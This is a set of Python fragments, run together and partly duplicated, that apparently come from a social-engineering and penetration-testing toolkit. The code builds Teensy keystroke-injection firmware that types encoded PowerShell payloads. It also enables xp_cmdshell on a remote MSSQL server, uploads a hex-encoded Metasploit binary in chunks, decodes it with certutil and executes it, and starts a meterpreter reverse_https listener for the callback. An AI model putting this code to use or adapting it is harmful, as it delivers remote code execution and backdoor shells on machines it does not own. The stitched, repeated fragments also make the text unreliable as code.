Keyboard.set_key1(0); Keyboard.send_now(); delay(1500); Keyboard.print(SomeCommand); Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); }} void PRES(int KeyCode){{ Keyboard.set_key1(KeyCode); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); }} """.format(random_filename=random_filename, encodedcommand=core.powershell_encodedcommand(powershell_command), vbs=vbs, bat=bat)) # delete temporary file subprocess.Popen("rm {0} 1> /dev/null 2>/dev/null".format(random_filename), shell=True).wait() print("[*] Binary to Teensy file exported as teensy.ino") # write the teensy.ino file out with open("teensy.ino", "w") as filewrite: # write the teensy.ino file out filewrite.write(output_variable) print(""" Instructions: Copy the converts.txt file to the sdcard on the Teensy device. Use the teensy.ino normally and use the Arduino IDE to place the latest code in there. Notice that you need to change some code marked above based on the Teensy and the Teensy++ based on how you soldered the PIN's on.
try: core.module_reload(src.payloads.powershell.prep) except: import src.payloads.powershell.prep #prep_powershell_payload() # create the directory if it does not exist if not os.path.isdir(core.setdir + "/reports/powershell"): os.makedirs(core.setdir + "/reports/powershell") # here we format everything for us with open(core.setdir + "/x86.powershell") as fileopen: x86 = fileopen.read() x86 = core.powershell_encodedcommand() + x86 core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell/"))) with open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") as filewrite: filewrite.write(x86) choice = core.yesno_prompt("0", "Do you want to start the listener now [yes/no]: ") if choice == 'NO': pass # if we want to start the listener if choice == 'YES': with open(core.setdir + "/reports/powershell/powershell.rc", "w") as filewrite: filewrite.write("use multi/handler\n" "set payload windows/meterpreter/reverse_https\n" "set LPORT {0}\n" "set LHOST 0.0.0.0\n"
} void PRES(int KeyCode){ Keyboard.set_key1(KeyCode); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); } void SPRE(int KeyCode){ Keyboard.set_modifier(MODIFIERKEY_SHIFT); Keyboard.set_key1(KeyCode); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); } """ % (core.powershell_encodedcommand()) print("[*] Payload has been extracted. Copying file to {0}".format(os.path.join(core.setdir + "reports/teensy.ino"))) if not os.path.isdir(os.path.join(core.setdir + "reports")): os.makedirs(os.path.join(core.setdir + "reports")) with open(os.path.join(core.setdir + "reports/teensy.ino"), "w") as filewrite: filewrite.write(teensy) choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no] ") if choice == "YES": # Open the IPADDR file if core.check_options("IPADDR=") != 0: ipaddr = core.check_options("IPADDR=") else: ipaddr = input("LHOST IP address to connect back on: ") core.update_options("IPADDR=" + ipaddr)
def deploy_hex2binary(ipaddr, port, username, password): # base variable used to select payload option option = None choice1 = "1" conn = _mssql.connect("{0}:{1}".format(ipaddr, port), username, password) core.print_status("Enabling the xp_cmdshell stored procedure...") try: conn.execute_query("exec master.dbo.sp_configure 'show advanced options',1;" "GO;" "RECONFIGURE;" "GO;" "exec master.dbo.sp_configure 'xp_cmdshell', 1;" "GO;" "RECONFIGURE;" "GO") except: pass # just throw a simple command via powershell to get the output try: print("""Pick which deployment method to use. The first is PowerShell and should be used on any modern operating system. The second method will use the certutil method to convert a binary to a binary.\n""") choice = input("Enter your choice:\n\n" "1.) Use PowerShell Injection (recommended)\n" "2.) Use Certutil binary conversion\n\n" "Enter your choice [1]:") if choice == "": choice = "1" if choice == "1": core.print_status("Powershell injection was selected to deploy to the remote system (awesome).") option_ps = input("Do you want to use powershell injection? [yes/no]:") if option_ps.lower() == "" or option_ps == "y" or option_ps == "yes": option = "1" core.print_status("Powershell delivery selected. Boom!") else: option = "2" # otherwise, fall back to the older version using debug conversion via hex else: core.print_status("Powershell not selected, using debug method.") option = "2" except Exception as err: print(err) payload_filename = None # if we don't have powershell if option == "2": # give option to use msf or your own core.print_status("You can either select to use a default " "Metasploit payload here or import your " "own in order to deliver to the system. " "Note that if you select your own, you " "will need to create your own listener " "at the end in order to capture this.\n\n") choice1 = input("1.) Use Metasploit (default)\n" "2.) Select your own\n\n" "Enter your choice[1]:") if choice1 == "": choice1 = "1" if choice1 == "2": attempts = 0 while attempts <= 2: payload_filename = input("Enter the path to your file you want to deploy to the system (ex /root/blah.exe):") if os.path.isfile(payload_filename): break else: core.print_error("File not found! Try again.") attempts += 1 else: core.print_error("Computers are hard. Find the path and try again. Defaulting to Metasploit payload.") choice1 = "1" if choice1 == "1": web_path = None #prep_powershell_payload() import src.core.payloadgen.create_payloads # if we are using a SET interactive shell payload then we need to make # the path under web_clone versus ~./set if os.path.isfile(os.path.join(core.userconfigpath, "set.payload")): web_path = os.path.join(core.userconfigpath, "web_clone") # then we are using metasploit else: if operating_system == "posix": web_path = core.userconfigpath # if it isn't there yet if not os.path.isfile(core.userconfigpath + "1msf.exe"): # move it then subprocess.Popen("cp %s/msf.exe %s/1msf.exe" % (core.userconfigpath, core.userconfigpath), shell=True).wait() subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" % (core.userconfigpath, core.userconfigpath), shell=True).wait() subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" % (core.userconfigpath, core.userconfigpath), shell=True).wait() payload_filename = os.path.join(web_path + "1msf.exe") with open(payload_filename, "rb") as fileopen: # read in the binary data = fileopen.read() # convert the binary to hex data = binascii.hexlify(data) # we write out binary out to a file with open(os.path.join(core.userconfigpath, "payload.hex"), "w") as filewrite: filewrite.write(data) if choice1 == "1": # if we are using metasploit, start the listener if not os.path.isfile(os.path.join(core.userconfigpath, "set.payload")): if operating_system == "posix": try: core.module_reload(pexpect) except: import pexpect core.print_status("Starting the Metasploit listener...") msf_path = core.meta_path() child2 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"), os.path.join(core.userconfigpath, "meta_config"))) # random executable name random_exe = core.generate_random_string(10, 15) # # next we deploy our hex to binary if we selected option 1 (powershell) # if option == "1": core.print_status("Using universal powershell x86 process downgrade attack..") payload = "x86" # specify ipaddress of reverse listener ipaddr = core.grab_ipaddress() core.update_options("IPADDR=" + ipaddr) port = input(core.setprompt(["29"], "Enter the port for the reverse [443]")) if not port: port = "443" core.update_options("PORT={0}".format(port)) core.update_options("POWERSHELL_SOLO=ON") core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...") #with open(os.path.join(core.userconfigpath, "payload_options.shellcode"), "w") as filewrite: # format needed for shellcode generation filewrite = file(core.userconfigpath + "payload_options.shellcode", "w") filewrite.write("windows/meterpreter/reverse_https {0},".format(port)) filewrite.close() try: core.module_reload(src.payloads.powershell.prep) except: import src.payloads.powershell.prep # launch powershell # create the directory if it does not exist if not os.path.isdir(os.path.join(core.userconfigpath, "reports/powershell")): os.makedirs(os.path.join(core.userconfigpath, "reports/powershell")) x86 = file(core.userconfigpath + "x86.powershell").read().rstrip() x86 = core.powershell_encodedcommand(x86) core.print_status("If you want the powershell commands and attack, " "they are exported to {0}".format(os.path.join(core.userconfigpath, "reports/powershell"))) filewrite = open(core.userconfigpath + "reports/powershell/x86_powershell_injection.txt", "w") filewrite.write(x86) filewrite.close() # if our payload is x86 based - need to prep msfconsole rc if payload == "x86": powershell_command = x86 filewrite = open(core.userconfigpath + "reports/powershell/powershell.rc", "w") filewrite.write("use multi/handler\n" "set payload windows/meterpreter/reverse_https\n" "set lport {0}\n" "set LHOST 0.0.0.0\n" "exploit -j".format(port)) filewrite.close() else: powershell_command = None # grab the metasploit path from config or smart detection msf_path = core.meta_path() if operating_system == "posix": try: core.module_reload(pexpect) except: import pexpect core.print_status("Starting the Metasploit listener...") child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path + "msfconsole"), os.path.join(core.userconfigpath, "reports/powershell/powershell.rc"))) core.print_status("Waiting for the listener to start first before we continue forward...") core.print_status("Be patient, Metasploit takes a little bit to start...") #child2.expect("Starting the payload handler", timeout=30000) child2.expect("Processing", timeout=30000) core.print_status("Metasploit started... Waiting a couple more seconds for listener to activate..") time.sleep(5) # assign random_exe command to the powershell command random_exe = powershell_command # # next we deploy our hex to binary if we selected option 2 (debug) # if option == "2": # here we start the conversion and execute the payload core.print_status("Sending the main payload via to be converted back to a binary.") # read in the file 900 bytes at a time #with open(os.path.join(core.userconfigpath, 'payload.hex'), 'r') as fileopen: fileopen = open(core.userconfigpath + 'payload.hex', "r") core.print_status("Dropping initial begin certificate header...") conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe)) while fileopen: data = fileopen.read(900).rstrip() #for data in fileopen.read(900).rstrip(): if data == "": break core.print_status("Deploying payload to victim machine (hex): {bold}{data}{endc}\n".format(bold=core.bcolors.BOLD, data=data, endc=core.bcolors.ENDC)) conn.execute_query("exec master..xp_cmdshell 'echo {data} >> {exe}.crt'".format(data=data, exe=random_exe)) core.print_status("Delivery complete. Converting hex back to binary format.") core.print_status("Dropping end header for binary format conversion...") conn.execute_query("exec master ..xp_cmdshell 'echo -----END CERTIFICATE----- >> {0}.crt'".format(random_exe)) core.print_status("Converting hex binary back to hex using certutil - Matthew Graeber man crush enabled.") conn.execute_query("exec master..xp_cmdshell 'certutil -decode {0}.crt {0}.exe'".format(random_exe)) core.print_status("Executing the payload - magic has happened and now its time for that moment.. " "You know. When you celebrate. Salute to you ninja - you deserve it.") conn.execute_query("exec master..xp_cmdshell '{0}.exe'".format(random_exe)) # if we are using SET payload if choice1 == "1": if os.path.isfile(os.path.join(core.userconfigpath, "set.payload")): core.print_status("Spawning separate child process for listener...") try: shutil.copyfile(os.path.join(core.userconfigpath, "web_clone/x"), definepath) except: pass # start a threaded webserver in the background subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True) # grab the port options # if core.check_options("PORT=") != 0: # port = core.heck_options("PORT=") # # # if for some reason the port didnt get created we default to 443 # else: # port = "443" # thread is needed here due to the connect not always terminating thread, # it hangs if thread isnt specified try: core.module_reload(thread) except: import thread # execute the payload # we append more commands if option 1 is used if option == "1": core.print_status("Triggering the powershell injection payload... ") # remove encoding if "toString" in powershell_command: powershell_command = powershell_command.split(".value.toString() '")[1].replace("'", "") powershell_command = 'powershell -enc "' + powershell_command sql_command = ("exec master..xp_cmdshell '{0}'".format(powershell_command)) thread.start_new_thread(conn.execute_query, (sql_command,)) # using the old method if option == "2": core.print_status("Triggering payload stager...") alphainject = "" if os.path.isfile(os.path.join(core.userconfigpath, "meterpreter.alpha")): with open(os.path.join(core.userconfigpath, "meterpreter.alpha")) as fileopen: alphainject = fileopen.read() sql_command = ("xp_cmdshell '{0}.exe {1}'".format(random_exe, alphainject)) # start thread of SQL command that executes payload thread.start_new_thread(conn.execute_query, (sql_command,)) time.sleep(1) # if pexpect doesnt exit right then it freaks out if choice1 == "1": if os.path.isfile(os.path.join(core.userconfigpath, "set.payload")): os.system("python ../../payloads/set_payloads/listener.py") try: # interact with the child process through pexpect child2.interact() try: os.remove("x") except: pass except: pass
def deploy_hex2binary(ipaddr, port, username, password): # base variable used to select payload option option = None choice1 = "1" conn = _mssql.connect("{0}:{1}".format(ipaddr, port), username, password) core.print_status("Enabling the xp_cmdshell stored procedure...") try: conn.execute_query( "exec master.dbo.sp_configure 'show advanced options',1;" "GO;" "RECONFIGURE;" "GO;" "exec master.dbo.sp_configure 'xp_cmdshell', 1;" "GO;" "RECONFIGURE;" "GO") except: pass # just throw a simple command via powershell to get the output try: print( """Pick which deployment method to use. The first is PowerShell and should be used on any modern operating system. The second method will use the certutil method to convert a binary to a binary.\n""" ) choice = input("Enter your choice:\n\n" "1.) Use PowerShell Injection (recommended)\n" "2.) Use Certutil binary conversion\n\n" "Enter your choice [1]:") if choice == "": choice = "1" if choice == "1": core.print_status( "Powershell injection was selected to deploy to the remote system (awesome)." ) option_ps = input( "Do you want to use powershell injection? [yes/no]:") if option_ps.lower( ) == "" or option_ps == "y" or option_ps == "yes": option = "1" core.print_status("Powershell delivery selected. Boom!") else: option = "2" # otherwise, fall back to the older version using debug conversion via hex else: core.print_status("Powershell not selected, using debug method.") option = "2" except Exception as err: print(err) payload_filename = None # if we don't have powershell if option == "2": # give option to use msf or your own core.print_status("You can either select to use a default " "Metasploit payload here or import your " "own in order to deliver to the system. " "Note that if you select your own, you " "will need to create your own listener " "at the end in order to capture this.\n\n") choice1 = input("1.) Use Metasploit (default)\n" "2.) Select your own\n\n" "Enter your choice[1]:") if choice1 == "": choice1 = "1" if choice1 == "2": attempts = 0 while attempts <= 2: payload_filename = input( "Enter the path to your file you want to deploy to the system (ex /root/blah.exe):" ) if os.path.isfile(payload_filename): break else: core.print_error("File not found! Try again.") attempts += 1 else: core.print_error( "Computers are hard. Find the path and try again. Defaulting to Metasploit payload." ) choice1 = "1" if choice1 == "1": web_path = None #prep_powershell_payload() import src.core.payloadgen.create_payloads # if we are using a SET interactive shell payload then we need to make # the path under web_clone versus ~./set if os.path.isfile(os.path.join(core.setdir + "set.payload")): web_path = os.path.join(core.setdir + "web_clone") # then we are using metasploit else: if operating_system == "posix": web_path = core.setdir # if it isn't there yet if not os.path.isfile(core.setdir + "1msf.exe"): # move it then subprocess.Popen("cp %s/msf.exe %s/1msf.exe" % (core.setdir, core.setdir), shell=True).wait() subprocess.Popen( "cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" % (core.setdir, core.setdir), shell=True).wait() subprocess.Popen( "cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" % (core.setdir, core.setdir), shell=True).wait() payload_filename = os.path.join(web_path + "1msf.exe") with open(payload_filename, "rb") as fileopen: # read in the binary data = fileopen.read() # convert the binary to hex data = binascii.hexlify(data) # we write out binary out to a file with open(os.path.join(core.setdir + "payload.hex"), "w") as filewrite: filewrite.write(data) if choice1 == "1": # if we are using metasploit, start the listener if not os.path.isfile(os.path.join(core.setdir + "set.payload")): if operating_system == "posix": try: core.module_reload(pexpect) except: import pexpect core.print_status( "Starting the Metasploit listener...") msf_path = core.meta_path() child2 = pexpect.spawn("{0} -r {1}\r\n\r\n".format( os.path.join(core.meta_path() + "msfconsole"), os.path.join(core.setdir + "meta_config"))) # random executable name random_exe = core.generate_random_string(10, 15) # # next we deploy our hex to binary if we selected option 1 (powershell) # if option == "1": core.print_status( "Using universal powershell x86 process downgrade attack..") payload = "x86" # specify ipaddress of reverse listener ipaddr = core.grab_ipaddress() core.update_options("IPADDR=" + ipaddr) port = input( core.setprompt(["29"], "Enter the port for the reverse [443]")) if not port: port = "443" core.update_options("PORT={0}".format(port)) core.update_options("POWERSHELL_SOLO=ON") core.print_status( "Prepping the payload for delivery and injecting alphanumeric shellcode..." ) #with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite: # format needed for shellcode generation filewrite = file(core.setdir + "/payload_options.shellcode", "w") filewrite.write("windows/meterpreter/reverse_https {0},".format(port)) filewrite.close() try: core.module_reload(src.payloads.powershell.prep) except: import src.payloads.powershell.prep # launch powershell # create the directory if it does not exist if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")): os.makedirs(os.path.join(core.setdir + "reports/powershell")) x86 = file(core.setdir + "x86.powershell").read().rstrip() x86 = core.powershell_encodedcommand(x86) core.print_status("If you want the powershell commands and attack, " "they are exported to {0}".format( os.path.join(core.setdir + "reports/powershell"))) filewrite = open( core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") filewrite.write(x86) filewrite.close() # if our payload is x86 based - need to prep msfconsole rc if payload == "x86": powershell_command = x86 filewrite = open(core.setdir + "reports/powershell/powershell.rc", "w") filewrite.write("use multi/handler\n" "set payload windows/meterpreter/reverse_https\n" "set lport {0}\n" "set LHOST 0.0.0.0\n" "exploit -j".format(port)) filewrite.close() else: powershell_command = None # grab the metasploit path from config or smart detection msf_path = core.meta_path() if operating_system == "posix": try: core.module_reload(pexpect) except: import pexpect core.print_status("Starting the Metasploit listener...") child2 = pexpect.spawn("{0} -r {1}".format( os.path.join(msf_path + "msfconsole"), os.path.join(core.setdir + "reports/powershell/powershell.rc"))) core.print_status( "Waiting for the listener to start first before we continue forward..." ) core.print_status( "Be patient, Metasploit takes a little bit to start...") #child2.expect("Starting the payload handler", timeout=30000) child2.expect("Processing", timeout=30000) core.print_status( "Metasploit started... Waiting a couple more seconds for listener to activate.." ) time.sleep(5) # assign random_exe command to the powershell command random_exe = powershell_command # # next we deploy our hex to binary if we selected option 2 (debug) # if option == "2": # here we start the conversion and execute the payload core.print_status( "Sending the main payload via to be converted back to a binary.") # read in the file 900 bytes at a time #with open(os.path.join(core.setdir + 'payload.hex'), 'r') as fileopen: fileopen = open(core.setdir + 'payload.hex', "r") core.print_status("Dropping initial begin certificate header...") conn.execute_query( "exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'" .format(random_exe)) while fileopen: data = fileopen.read(900).rstrip() #for data in fileopen.read(900).rstrip(): if data == "": break core.print_status( "Deploying payload to victim machine (hex): {bold}{data}{endc}\n" .format(bold=core.bcolors.BOLD, data=data, endc=core.bcolors.ENDC)) conn.execute_query( "exec master..xp_cmdshell 'echo {data} >> {exe}.crt'".format( data=data, exe=random_exe)) core.print_status( "Delivery complete. Converting hex back to binary format.") core.print_status( "Dropping end header for binary format conversion...") conn.execute_query( "exec master ..xp_cmdshell 'echo -----END CERTIFICATE----- >> {0}.crt'" .format(random_exe)) core.print_status( "Converting hex binary back to hex using certutil - Matthew Graeber man crush enabled." ) conn.execute_query( "exec master..xp_cmdshell 'certutil -decode {0}.crt {0}.exe'". format(random_exe)) core.print_status( "Executing the payload - magic has happened and now its time for that moment.. " "You know. When you celebrate. Salute to you ninja - you deserve it." ) conn.execute_query( "exec master..xp_cmdshell '{0}.exe'".format(random_exe)) # if we are using SET payload if choice1 == "1": if os.path.isfile(os.path.join(core.setdir + "set.payload")): core.print_status( "Spawning separate child process for listener...") try: shutil.copyfile(os.path.join(core.setdir + "web_clone/x"), definepath) except: pass # start a threaded webserver in the background subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True) # grab the port options # if core.check_options("PORT=") != 0: # port = core.heck_options("PORT=") # # # if for some reason the port didnt get created we default to 443 # else: # port = "443" # thread is needed here due to the connect not always terminating thread, # it hangs if thread isnt specified try: core.module_reload(thread) except: import thread # execute the payload # we append more commands if option 1 is used if option == "1": core.print_status("Triggering the powershell injection payload... ") # remove encoding if "toString" in powershell_command: powershell_command = powershell_command.split( ".value.toString() '")[1].replace("'", "") powershell_command = 'powershell -enc "' + powershell_command sql_command = ( "exec master..xp_cmdshell '{0}'".format(powershell_command)) thread.start_new_thread(conn.execute_query, (sql_command, )) # using the old method if option == "2": core.print_status("Triggering payload stager...") alphainject = "" if os.path.isfile(os.path.join(core.setdir + "meterpreter.alpha")): with open(os.path.join(core.setdir + "meterpreter.alpha")) as fileopen: alphainject = fileopen.read() sql_command = ("xp_cmdshell '{0}.exe {1}'".format( random_exe, alphainject)) # start thread of SQL command that executes payload thread.start_new_thread(conn.execute_query, (sql_command, )) time.sleep(1) # if pexpect doesnt exit right then it freaks out if choice1 == "1": if os.path.isfile(os.path.join(core.setdir + "set.payload")): os.system("python ../../payloads/set_payloads/listener.py") try: # interact with the child process through pexpect child2.interact() try: os.remove("x") except: pass except: pass
Keyboard.send_now(); delay(1500); Keyboard.print(SomeCommand); Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); }} void PRES(int KeyCode){{ Keyboard.set_key1(KeyCode); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); }} """.format(random_filename=random_filename, encodedcommand=core.powershell_encodedcommand(powershell_command), vbs=vbs, bat=bat)) # delete temporary file subprocess.Popen("rm {0} 1> /dev/null 2>/dev/null".format(random_filename), shell=True).wait() print("[*] Binary to Teensy file exported as teensy.ino") # write the teensy.ino file out with open("teensy.ino", "w") as filewrite: # write the teensy.ino file out filewrite.write(output_variable) print(""" Instructions: Copy the converts.txt file to the sdcard on the Teensy device. Use the teensy.ino normally
} void PRES(int KeyCode){ Keyboard.set_key1(KeyCode); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); } void SPRE(int KeyCode){ Keyboard.set_modifier(MODIFIERKEY_SHIFT); Keyboard.set_key1(KeyCode); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); } """ % (core.powershell_encodedcommand(shellcode))) print("[*] Payload has been extracted. Files can be found under /root/.set/reports/teensy.ino") if not os.path.isdir(os.path.join(core.userconfigpath, "reports")): os.makedirs(os.path.join(core.userconfigpath, "reports")) with open(os.path.join(core.userconfigpath, "reports/teensy.ino"), "w") as filewrite: filewrite.write(teensy) choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no] ") if choice == "YES": # Open the IPADDR file if core.check_options("IPADDR=") != 0: ipaddr = core.check_options("IPADDR=") else: ipaddr = input("LHOST IP address to connect back on: ")